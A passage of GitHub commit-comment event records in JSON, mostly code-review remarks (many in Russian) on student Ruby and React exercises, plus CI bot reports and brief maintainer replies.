`call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-07T13:14:42Z"}
{"id":"7932333552","type":"CommitCommentEvent","actor":{"login":"bukka"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29629632,"position":null,"line":null,"path":null,"commit_id":"d404b5e25593e3c9de40e02b1c4cf934c5bb61e4","created_at":"2018-07-07T13:16:32Z","updated_at":"2018-07-07T13:16:32Z","author_association":"CONTRIBUTOR","body":"Just for the record I was just checking that and @weltling has already fixed the failing test (removed the strange one and used the existing one for win) in https://github.com/php/php-src/commit/6d61814d0e2115b834b1e6cbc27c6b05299b3e7a#diff-3ad17082a93de2b64750ca344f4be75f . "}},"created_at":"2018-07-07T13:16:32Z"}
{"id":"7932334146","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629635,"position":2,"line":2,"path":"Lesson3/train.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T13:17:05Z","updated_at":"2018-07-07T13:17:05Z","author_association":"NONE","body":"Аксэссор подразумевает, что ты открываешь эти атрибуты для редактирования напряму извне класса. То есть разрешаешь клиентскому коду сделать что-то такое ``` @train.speed = \"Pants\" ```. Это нарушение инкапсуляции."}},"created_at":"2018-07-07T13:17:05Z"}
{"id":"7932334507","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629636,"position":4,"line":4,"path":"Lesson3/train.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T13:17:20Z","updated_at":"2018-07-07T13:17:20Z","author_association":"NONE","body":"ридеры можно через запятую писать"}},"created_at":"2018-07-07T13:17:20Z"}
{"id":"7932335573","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29629639,"position":62,"line":61,"path":"my_game.rb","commit_id":"db1db5143893240c7bc008c7341f4683374377fc","created_at":"2018-07-07T13:18:14Z","updated_at":"2018-07-07T13:18:14Z","author_association":"NONE","body":"странный метод... \r\n\r\nво-первых странный вызов в 77 и 79 строках\r\nинстанс-переменные нет смысла передавать в аргументах  - они и так доступны по всему классу\r\nесли ты передаешь в аргументах инстанс переменную, то скорее всего твой дизайн хромает...\r\n\r\nво-вторых... ты попытался сделать универсальный метод для обоих игроков, но если посмотреть на него внимательно, то понятно, что по сути это все равно 2 метода...\r\nпроще было написать два метода: `skip_dealer`, `skip_user` - в таком варианте не надо передавать аргументы, не надо проверять класс - заметное упрощение\r\n\r\nв-третьих... если внимательно почитать предыдущий абазац и посмотреть на код, то понимаешь, что ни твой метод, ни 2 новых не нужны... можно просто в тех строках, где ты его вызываешь `dealer_turn` или `user_turn`... у тебя же получается ты сначала выбираешь кто пропустит код, потом отправляешь этого игрока в метод, который снова проверяет \"кто пришел\" и потом вызывает определенный метод... чудесная путанница... )))"}},"created_at":"2018-07-07T13:18:14Z"}
{"id":"7932336336","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629641,"position":6,"line":6,"path":"Lesson3/train.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T13:18:53Z","updated_at":"2018-07-07T13:18:53Z","author_association":"NONE","body":"speed нет смысле делать дефолт аргументом. При создании поезд ехать не будет. Так-что это присвоить speed 0 можно прямо в теле метода и убрать из параметров вообще"}},"created_at":"2018-07-07T13:18:53Z"}
{"id":"7932337526","type":"CommitCommentEvent","actor":{"login":"wolfbeast"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29629644,"position":null,"line":null,"path":null,"commit_id":"e9f79994278968cc86698a7d90e05ca01201c441","created_at":"2018-07-07T13:19:58Z","updated_at":"2018-07-07T13:19:58Z","author_association":"MEMBER","body":"Already corrected."}},"created_at":"2018-07-07T13:19:58Z"}
{"id":"7932338739","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629646,"position":14,"line":14,"path":"Lesson3/train.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T13:20:58Z","updated_at":"2018-07-07T13:20:58Z","author_association":"NONE","body":"В ТЗ сказано: Может тормозить (сбрасывать скорость до нуля). То есть нам нужны 2 метода - один на ускорение и другой на замедление. И пусть принимают аргументом коэффициент изменения скорости"}},"created_at":"2018-07-07T13:20:58Z"}
{"id":"7932338842","type":"CommitCommentEvent","actor":{"login":"Ahsan-786"},"repo":{"name":"Ahsan-786/VIM_Commands"},"payload":{"comment":{"id":29629647,"position":null,"line":null,"path":null,"commit_id":"6dc2e73ed07cc683fddef4d60112a86ab139242e","created_at":"2018-07-07T13:21:03Z","updated_at":"2018-07-07T13:21:03Z","author_association":"OWNER","body":"vim commands cheetsheet"}},"created_at":"2018-07-07T13:21:03Z"}
{"id":"7932339350","type":"CommitCommentEvent","actor":{"login":"vitorgamer58"},"repo":{"name":"Brexchange/Brexchange"},"payload":{"comment":{"id":29629648,"position":null,"line":null,"path":null,"commit_id":"d4e39e18af5c825acca8d9eb2256b1fcff954d59","created_at":"2018-07-07T13:21:25Z","updated_at":"2018-07-07T13:21:25Z","author_association":"MEMBER","body":"refer to https://github.com/peatio/peatio/issues/781"}},"created_at":"2018-07-07T13:21:25Z"}
{"id":"7932339355","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629649,"position":19,"line":19,"path":"Lesson3/train.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T13:21:26Z","updated_at":"2018-07-07T13:21:26Z","author_association":"NONE","body":"Если обращаешься к ридеру - @ не обязателен"}},"created_at":"2018-07-07T13:21:26Z"}
{"id":"7932339375","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29629650,"position":null,"line":null,"path":null,"commit_id":"cc7b6ceb6e0ce4284cf2e204930bda436b7c5cf8","created_at":"2018-07-07T13:21:27Z","updated_at":"2018-07-07T13:21:27Z","author_association":"COLLABORATOR","body":"Puzzle `396-93372351` discovered in   [`.drone.yml`](  https://github.com/fidals/shopelectro/blob/master/.drone.yml)   and submitted as #408. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-07T13:21:27Z"}
{"id":"7932340937","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629653,"position":28,"line":28,"path":"Lesson3/train.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T13:22:45Z","updated_at":"2018-07-07T13:22:45Z","author_association":"NONE","body":"Тут тоже не обязательны @. И еще можешь сделать раннее возвращение из метода, если эти условия вернут правду"}},"created_at":"2018-07-07T13:22:45Z"}
{"id":"7932341057","type":"CommitCommentEvent","actor":{"login":"Yivan"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":29629655,"position":null,"line":null,"path":null,"commit_id":"2c24923c5a011f767e3894c3a6c0cf5238332d73","created_at":"2018-07-07T13:22:51Z","updated_at":"2018-07-07T13:22:51Z","author_association":"CONTRIBUTOR","body":"@brusch \r\nIf you look at this page, in fact there is some redis informaiton too, but it says 2.6 minimum...\r\nhttps://pimcore.com/docs/master/Development_Documentation/Development_Tools_and_Details/Cache/index.html#page_Recommended-Redis-Configuration\r\nMaybe the \"Recommended Redis Configuration (redis.conf)\" chapter on the Cache page should just point to the System Requirements page ?"}},"created_at":"2018-07-07T13:22:51Z"}
{"id":"7932348087","type":"CommitCommentEvent","actor":{"login":"SleepwalkerPWD"},"repo":{"name":"SleepwalkerPWD/test_project_v1"},"payload":{"comment":{"id":29629674,"position":null,"line":null,"path":null,"commit_id":"f03adae11653b9fb8be5ef19ee50df538410df24","created_at":"2018-07-07T13:28:37Z","updated_at":"2018-07-07T13:28:37Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-07T13:28:37Z"}
{"id":"7932348384","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629675,"position":49,"line":49,"path":"Lesson3/train.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T13:28:53Z","updated_at":"2018-07-07T13:28:53Z","author_association":"NONE","body":"Как он так сразу телепортируется с первой станции на последнюю, если поедет назад?"}},"created_at":"2018-07-07T13:28:53Z"}
{"id":"7932348891","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29629676,"position":41,"line":42,"path":"player.rb","commit_id":"db1db5143893240c7bc008c7341f4683374377fc","created_at":"2018-07-07T13:29:18Z","updated_at":"2018-07-07T13:29:18Z","author_association":"NONE","body":"по сути метод делает то же, что и следующий - принимает деньги... надо их оба заменить одним\r\nназвание неудачное, оно относится к классу МояИгра\r\n"}},"created_at":"2018-07-07T13:29:18Z"}
{"id":"7932349333","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629678,"position":49,"line":49,"path":"Lesson3/train.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T13:29:35Z","updated_at":"2018-07-07T13:29:35Z","author_association":"NONE","body":"На самом деле тут нужны три метода - один возращающий текущую станцию и два метода для возвращения следующей станции и предыдущей"}},"created_at":"2018-07-07T13:29:35Z"}
{"id":"7932350047","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29629680,"position":41,"line":42,"path":"player.rb","commit_id":"db1db5143893240c7bc008c7341f4683374377fc","created_at":"2018-07-07T13:30:08Z","updated_at":"2018-07-07T13:30:08Z","author_association":"NONE","body":"ну и см. комментарии ниже"}},"created_at":"2018-07-07T13:30:08Z"}
{"id":"7932350731","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29629686,"position":null,"line":null,"path":null,"commit_id":"ab0f99373d41efc7b74df1e66fcbe70d8c6f025c","created_at":"2018-07-07T13:30:34Z","updated_at":"2018-07-07T13:30:34Z","author_association":"MEMBER","body":"That's not what it actually did - it returned zero for a read callback.  It was never the same as not setting the callback at all, because it didn't blow up on call if you used `resolve` rather than `resolve_safe`, and `resolve` doesn't provide a default.  `NOOP` with read callbacks was always broken."}},"created_at":"2018-07-07T13:30:34Z"}
{"id":"7932351036","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629689,"position":62,"line":62,"path":"Lesson3/train.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T13:30:47Z","updated_at":"2018-07-07T13:30:47Z","author_association":"NONE","body":"а есть ли внутри массива эти элементы ты даже не проверяешь. Ладно, тут в любом случае все изменится после комментов выше"}},"created_at":"2018-07-07T13:30:47Z"}
{"id":"7932352890","type":"CommitCommentEvent","actor":{"login":"fakeidentity"},"repo":{"name":"fakeidentity/messingwitharduino"},"payload":{"comment":{"id":29629694,"position":null,"line":null,"path":null,"commit_id":"d3b566a87f4c73946f48dd177991bfafd35baf14","created_at":"2018-07-07T13:32:13Z","updated_at":"2018-07-07T13:32:13Z","author_association":"OWNER","body":"I'm hilarious."}},"created_at":"2018-07-07T13:32:13Z"}
{"id":"7932353038","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629695,"position":74,"line":74,"path":"Lesson3/train.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T13:32:20Z","updated_at":"2018-07-07T13:32:20Z","author_association":"NONE","body":"Тут тоже все изменится, когда будут использоваться методы, которые возвращают предыдущую и следующую станции"}},"created_at":"2018-07-07T13:32:20Z"}
{"id":"7932353623","type":"CommitCommentEvent","actor":{"login":"nsgoyat"},"repo":{"name":"VirtuBox/nginx-ee"},"payload":{"comment":{"id":29629696,"position":null,"line":null,"path":null,"commit_id":"735de3b95c0fc86b00a1657273da9b378bc283e9","created_at":"2018-07-07T13:32:47Z","updated_at":"2018-07-07T13:32:47Z","author_association":"NONE","body":"Thanks a lot for your continuous work master. I was wondering if you have any plans to include Cloudflare HPACK Patch? (https://github.com/cloudflare/sslconfig/blob/master/patches/nginx_1.13.1_http2_hpack.patch)"}},"created_at":"2018-07-07T13:32:47Z"}
{"id":"7932354335","type":"CommitCommentEvent","actor":{"login":"stonebig"},"repo":{"name":"pyviz/hvplot"},"payload":{"comment":{"id":29629699,"position":null,"line":null,"path":null,"commit_id":"7e3bd9d4eaf8ad6bddb94cee0b1c4228ee566582","created_at":"2018-07-07T13:33:21Z","updated_at":"2018-07-07T13:33:21Z","author_association":"NONE","body":"can we have hvplot-0.2.0 on pypi ?"}},"created_at":"2018-07-07T13:33:21Z"}
{"id":"7932355685","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29629700,"position":null,"line":null,"path":null,"commit_id":"d037e8fca53f54a92f41a9330802a85598971086","created_at":"2018-07-07T13:34:24Z","updated_at":"2018-07-07T13:34:24Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180707-133423 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180707-133423\") to [dev](https://console.bluemix.net/apps/6fd8391d-0cdd-414d-8345-ae8a2ead0e5d?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-07T13:34:24Z"}
{"id":"7932356503","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"VukZh/JS-10"},"payload":{"comment":{"id":29629703,"position":1,"line":1,"path":"src/actions/add.js","commit_id":"6dc57efa5ccc6b9c51267b33a5720527bd4be7d0","created_at":"2018-07-07T13:35:04Z","updated_at":"2018-07-07T13:35:04Z","author_association":"NONE","body":"НУ нет, обынчо так не делят - а делят по областям программы. и просто экспортируют несколько из файла."}},"created_at":"2018-07-07T13:35:04Z"}
{"id":"7932357652","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"VukZh/JS-10"},"payload":{"comment":{"id":29629704,"position":6,"line":6,"path":"src/actions/fav.js","commit_id":"6dc57efa5ccc6b9c51267b33a5720527bd4be7d0","created_at":"2018-07-07T13:35:58Z","updated_at":"2018-07-07T13:35:58Z","author_association":"NONE","body":"Такие экшены можно просто переписать как `export const fav = (favcity) => ({ type: \"CITY_FAVOR\", payload: favcity});`\r\n"}},"created_at":"2018-07-07T13:35:58Z"}
{"id":"7932359031","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"VukZh/JS-10"},"payload":{"comment":{"id":29629705,"position":6,"line":6,"path":"src/containers/cities.js","commit_id":"6dc57efa5ccc6b9c51267b33a5720527bd4be7d0","created_at":"2018-07-07T13:37:04Z","updated_at":"2018-07-07T13:37:04Z","author_association":"NONE","body":"Этот можно переписать в виде стрелочного компонента"}},"created_at":"2018-07-07T13:37:04Z"}
{"id":"7932359403","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"VukZh/JS-10"},"payload":{"comment":{"id":29629707,"position":11,"line":11,"path":"src/containers/cities.js","commit_id":"6dc57efa5ccc6b9c51267b33a5720527bd4be7d0","created_at":"2018-07-07T13:37:20Z","updated_at":"2018-07-07T13:37:20Z","author_association":"NONE","body":"<div/>"}},"created_at":"2018-07-07T13:37:20Z"}
{"id":"7932359799","type":"CommitCommentEvent","actor":{"login":"xla"},"repo":{"name":"tsenart/vegeta"},"payload":{"comment":{"id":29629711,"position":null,"line":null,"path":null,"commit_id":"fc5ca537bf4f01de94b0458729f455289351397e","created_at":"2018-07-07T13:37:39Z","updated_at":"2018-07-07T13:37:39Z","author_association":"COLLABORATOR","body":"I for one welcome our new overlords.\r\n\r\n![overlords](https://i.imgur.com/5ovhkjp.gif)"}},"created_at":"2018-07-07T13:37:39Z"}
{"id":"7932362243","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"VukZh/JS-10"},"payload":{"comment":{"id":29629715,"position":29,"line":29,"path":"src/containers/cities.js","commit_id":"6dc57efa5ccc6b9c51267b33a5720527bd4be7d0","created_at":"2018-07-07T13:39:32Z","updated_at":"2018-07-07T13:39:32Z","author_association":"NONE","body":"Ну что за мода пошла выносить mapStateToProps в отдельную функцию. МОжно сразу пистаь в параметрах connect"}},"created_at":"2018-07-07T13:39:32Z"}
{"id":"7932362608","type":"CommitCommentEvent","actor":{"login":"Misakichan93"},"repo":{"name":"Bosu123l/MagisterkaAni"},"payload":{"comment":{"id":29629716,"position":4,"line":148,"path":"Magisterka/Domain/DefectSFinder.cs","commit_id":"1c6d73dd8addbb3767a8aed1a53a434ce15a73b7","created_at":"2018-07-07T13:39:48Z","updated_at":"2018-07-07T13:39:48Z","author_association":"COLLABORATOR","body":"var"}},"created_at":"2018-07-07T13:39:48Z"}
{"id":"7932362772","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"VukZh/JS-10"},"payload":{"comment":{"id":29629717,"position":20,"line":20,"path":"src/containers/favorcity.js","commit_id":"6dc57efa5ccc6b9c51267b33a5720527bd4be7d0","created_at":"2018-07-07T13:39:57Z","updated_at":"2018-07-07T13:39:57Z","author_association":"NONE","body":"Это делается марждинами и пддингами"}},"created_at":"2018-07-07T13:39:57Z"}
{"id":"7932363906","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"VukZh/JS-10"},"payload":{"comment":{"id":29629718,"position":31,"line":31,"path":"src/containers/favorcity.js","commit_id":"6dc57efa5ccc6b9c51267b33a5720527bd4be7d0","created_at":"2018-07-07T13:40:46Z","updated_at":"2018-07-07T13:40:46Z","author_association":"NONE","body":"А почему не this.props.select(this.props.favor) ?"}},"created_at":"2018-07-07T13:40:46Z"}
{"id":"7932363938","type":"CommitCommentEvent","actor":{"login":"philippjfr"},"repo":{"name":"pyviz/hvplot"},"payload":{"comment":{"id":29629719,"position":null,"line":null,"path":null,"commit_id":"7e3bd9d4eaf8ad6bddb94cee0b1c4228ee566582","created_at":"2018-07-07T13:40:48Z","updated_at":"2018-07-07T13:40:48Z","author_association":"CONTRIBUTOR","body":"Should appear once this build is done: https://travis-ci.org/pyviz/hvplot/jobs/401202145"}},"created_at":"2018-07-07T13:40:48Z"}
{"id":"7932364129","type":"CommitCommentEvent","actor":{"login":"SamJamess"},"repo":{"name":"SamJamess/1"},"payload":{"comment":{"id":29629720,"position":null,"line":null,"path":null,"commit_id":"b991da058c5d3e3bea1aa94e8a55c783a97dc327","created_at":"2018-07-07T13:40:57Z","updated_at":"2018-07-07T13:40:57Z","author_association":"OWNER","body":":+1: ### "}},"created_at":"2018-07-07T13:40:57Z"}
{"id":"7932364643","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"VukZh/JS-10"},"payload":{"comment":{"id":29629721,"position":8,"line":8,"path":"src/containers/findcity.js","commit_id":"6dc57efa5ccc6b9c51267b33a5720527bd4be7d0","created_at":"2018-07-07T13:41:20Z","updated_at":"2018-07-07T13:41:20Z","author_association":"NONE","body":"Точно такое нужно?"}},"created_at":"2018-07-07T13:41:20Z"}
{"id":"7932364786","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"VukZh/JS-10"},"payload":{"comment":{"id":29629722,"position":11,"line":11,"path":"src/containers/findcity.js","commit_id":"6dc57efa5ccc6b9c51267b33a5720527bd4be7d0","created_at":"2018-07-07T13:41:26Z","updated_at":"2018-07-07T13:41:26Z","author_association":"NONE","body":"==="}},"created_at":"2018-07-07T13:41:26Z"}
{"id":"7932365119","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"VukZh/JS-10"},"payload":{"comment":{"id":29629723,"position":22,"line":22,"path":"src/containers/findcity.js","commit_id":"6dc57efa5ccc6b9c51267b33a5720527bd4be7d0","created_at":"2018-07-07T13:41:41Z","updated_at":"2018-07-07T13:41:41Z","author_association":"NONE","body":"Это на этой же строчке можно написать"}},"created_at":"2018-07-07T13:41:41Z"}
{"id":"7932365486","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"VukZh/JS-10"},"payload":{"comment":{"id":29629724,"position":36,"line":36,"path":"src/containers/findcity.js","commit_id":"6dc57efa5ccc6b9c51267b33a5720527bd4be7d0","created_at":"2018-07-07T13:41:57Z","updated_at":"2018-07-07T13:41:57Z","author_association":"NONE","body":"А это вынести в функцию, например)"}},"created_at":"2018-07-07T13:41:57Z"}
{"id":"7932366614","type":"CommitCommentEvent","actor":{"login":"stonebig"},"repo":{"name":"pyviz/hvplot"},"payload":{"comment":{"id":29629731,"position":null,"line":null,"path":null,"commit_id":"7e3bd9d4eaf8ad6bddb94cee0b1c4228ee566582","created_at":"2018-07-07T13:42:49Z","updated_at":"2018-07-07T13:42:49Z","author_association":"NONE","body":"thanks"}},"created_at":"2018-07-07T13:42:49Z"}
{"id":"7932366655","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29629732,"position":null,"line":null,"path":null,"commit_id":"a72e4454c3031860290fc119785945eb62ec2c9c","created_at":"2018-07-07T13:42:51Z","updated_at":"2018-07-07T13:42:51Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a72e4454c3031860290fc119785945eb62ec2c9c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a72e4454c3031860290fc119785945eb62ec2c9c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a72e4454c3031860290fc119785945eb62ec2c9c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.18%25-green.png)</a>\n"}},"created_at":"2018-07-07T13:42:51Z"}
{"id":"7932366919","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"VukZh/JS-10"},"payload":{"comment":{"id":29629734,"position":10,"line":10,"path":"src/ft.js","commit_id":"6dc57efa5ccc6b9c51267b33a5720527bd4be7d0","created_at":"2018-07-07T13:43:03Z","updated_at":"2018-07-07T13:43:03Z","author_association":"NONE","body":"ВОт это точно можно было просто Main написать, или даже в index.html"}},"created_at":"2018-07-07T13:43:03Z"}
{"id":"7932367582","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"VukZh/JS-10"},"payload":{"comment":{"id":29629736,"position":1,"line":1,"path":"src/reducers/favor.js","commit_id":"6dc57efa5ccc6b9c51267b33a5720527bd4be7d0","created_at":"2018-07-07T13:43:32Z","updated_at":"2018-07-07T13:43:32Z","author_association":"NONE","body":"И я юы это в один редьюсер запихнул, уж слижком они маленькие..."}},"created_at":"2018-07-07T13:43:32Z"}
{"id":"7932371851","type":"CommitCommentEvent","actor":{"login":"philippjfr"},"repo":{"name":"pyviz/hvplot"},"payload":{"comment":{"id":29629742,"position":null,"line":null,"path":null,"commit_id":"7e3bd9d4eaf8ad6bddb94cee0b1c4228ee566582","created_at":"2018-07-07T13:46:51Z","updated_at":"2018-07-07T13:46:51Z","author_association":"CONTRIBUTOR","body":"Now done: https://pypi.org/project/hvplot/"}},"created_at":"2018-07-07T13:46:51Z"}
{"id":"7932372226","type":"CommitCommentEvent","actor":{"login":"HeyKJ"},"repo":{"name":"boboram/JAVA"},"payload":{"comment":{"id":29629744,"position":null,"line":null,"path":null,"commit_id":"43f8de759e2980543c0ee1f8258bd199c0b387b2","created_at":"2018-07-07T13:47:08Z","updated_at":"2018-07-07T13:47:08Z","author_association":"COLLABORATOR","body":"좋은 자료 감사요"}},"created_at":"2018-07-07T13:47:08Z"}
{"id":"7932372827","type":"CommitCommentEvent","actor":{"login":"GNOME-IS-LIFE"},"repo":{"name":"MrMEEE/bumblebee-Old-and-abbandoned"},"payload":{"comment":{"id":29629746,"position":null,"line":null,"path":null,"commit_id":"a047be85247755cdbe0acce6f1dafc8beb84f2ac","created_at":"2018-07-07T13:47:36Z","updated_at":"2018-07-07T13:47:36Z","author_association":"NONE","body":"wow"}},"created_at":"2018-07-07T13:47:36Z"}
{"id":"7932373995","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29629747,"position":25,"line":56,"path":"src/mame/includes/mappy.h","commit_id":"8fe31f857d3d17ba4da11a5f84bfde768456d63d","created_at":"2018-07-07T13:48:33Z","updated_at":"2018-07-07T13:48:33Z","author_association":"MEMBER","body":"It's a bad idea to make timer ID constants private - derived classes need to be able to access them to avoid conflicts.  But really, you should try to avoid dispatching through `device_timer` altogether.  It's more efficient to use delegate timers."}},"created_at":"2018-07-07T13:48:33Z"}
{"id":"7932374081","type":"CommitCommentEvent","actor":{"login":"amicarel"},"repo":{"name":"amicarel/prova"},"payload":{"comment":{"id":29629748,"position":null,"line":null,"path":null,"commit_id":"6503b1a13dfabf56a34eec759cf74057fe558bf0","created_at":"2018-07-07T13:48:37Z","updated_at":"2018-07-07T13:48:37Z","author_association":"OWNER","body":",zzzzz"}},"created_at":"2018-07-07T13:48:37Z"}
{"id":"7932378683","type":"CommitCommentEvent","actor":{"login":"alexleskov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629755,"position":2,"line":2,"path":"Lesson3/train.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T13:52:03Z","updated_at":"2018-07-07T13:52:03Z","author_association":"OWNER","body":"Тоже самое касается ридеров и сеттеров, верно?"}},"created_at":"2018-07-07T13:52:03Z"}
{"id":"7932379514","type":"CommitCommentEvent","actor":{"login":"alexleskov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29629756,"position":4,"line":4,"path":"Lesson3/train.rb","commit_id":"10c48a95954b6fc4933d0f993188bff69b6bc043","created_at":"2018-07-07T13:52:38Z","updated_at":"2018-07-07T13:52:38Z","author_association":"OWNER","body":"У меня почему то ошибку выдавало. Я пробовал вот так: attr_reader (:type, :vagon_count)"}},"created_at":"2018-07-07T13:52:38Z"}
{"id":"7932381139","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29629760,"position":null,"line":null,"path":null,"commit_id":"747cdcad6b575376eb75c85263b4174e2bc5bac7","created_at":"2018-07-07T13:53:50Z","updated_at":"2018-07-07T13:53:50Z","author_association":"NONE","body":"По поводу:\r\n```\r\n def show_trains\r\n   Train.all.each_pair { |id, train| puts \"Поезд #{id} - тип #{train.type}\" }\r\nend\r\n```\r\nв моем представлении, то, что мы сохраняем поезда в классе (method register_instance) это подобие уровня базы данных. А то, что сохраняется в ```@trains``` в Interface, это пользовательская сессия. Я представляю, что код класса делят все пользователи, а код интерфэйса, только один. Мы создаем Interface.new для “текущей сессии”. По этому мне кажется, что логичней брать поезда, не из класса, а те, которые сохранены в ``` @trains ``` интерфэйса. "}},"created_at":"2018-07-07T13:53:50Z"}
